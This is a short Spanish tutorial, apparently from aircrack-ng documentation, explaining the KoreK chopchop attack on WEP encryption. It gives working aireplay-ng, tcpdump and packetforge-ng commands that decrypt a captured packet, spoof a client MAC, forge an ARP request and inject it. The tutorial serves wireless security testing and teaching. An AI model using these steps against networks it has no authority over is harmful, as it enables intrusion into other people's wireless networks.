KoreK chopchop

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin necesidad de conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela únicamente el texto plano. De cualquier modo, algunos puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el punto de acceso tira paquetes menores de 42 bytes, aireplay intenta adivinar el resto de los datos, tan pronto como el encabezado (headers) sea predecible. Si un paquete IP es capturado, automáticamente comprueba el checksum del encabezado para ver si es correcto, y despues trata de adivinar las partes que le faltan. Este ataque requiere como mínimo un paquete de datos WEP.

1. Primero, desencriptamos un paquete

    aireplay-ng -4 ath0

Esto puede que no funcione, ya que en muchos casos los puntos de acceso no aceptan los paquetes de datos porque no saben que MAC se los está enviando. En este caso tenemos que usar la dirección MAC de un cliente conectado que si va a tener permiso para enviar paquetes de datos dentro de la red:

    aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Vamos a echar un vistazo a la dirección IP

    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type [...]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Ahora, forjemos una petición (ARP request) La IP de origen no importa (192.168.1.100) pero la Ip de destino (192.168.1.2) debe responder a las peticiones ARP (ARP requests). La dirección MAC de origen tiene que ser la de un cliente asociado, en caso de que exista filtrado MAC.

    packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. Y reenviamos nuestra petición ARP forjada

    aireplay-ng -2 -r arp.cap ath0

Mira chopchop theory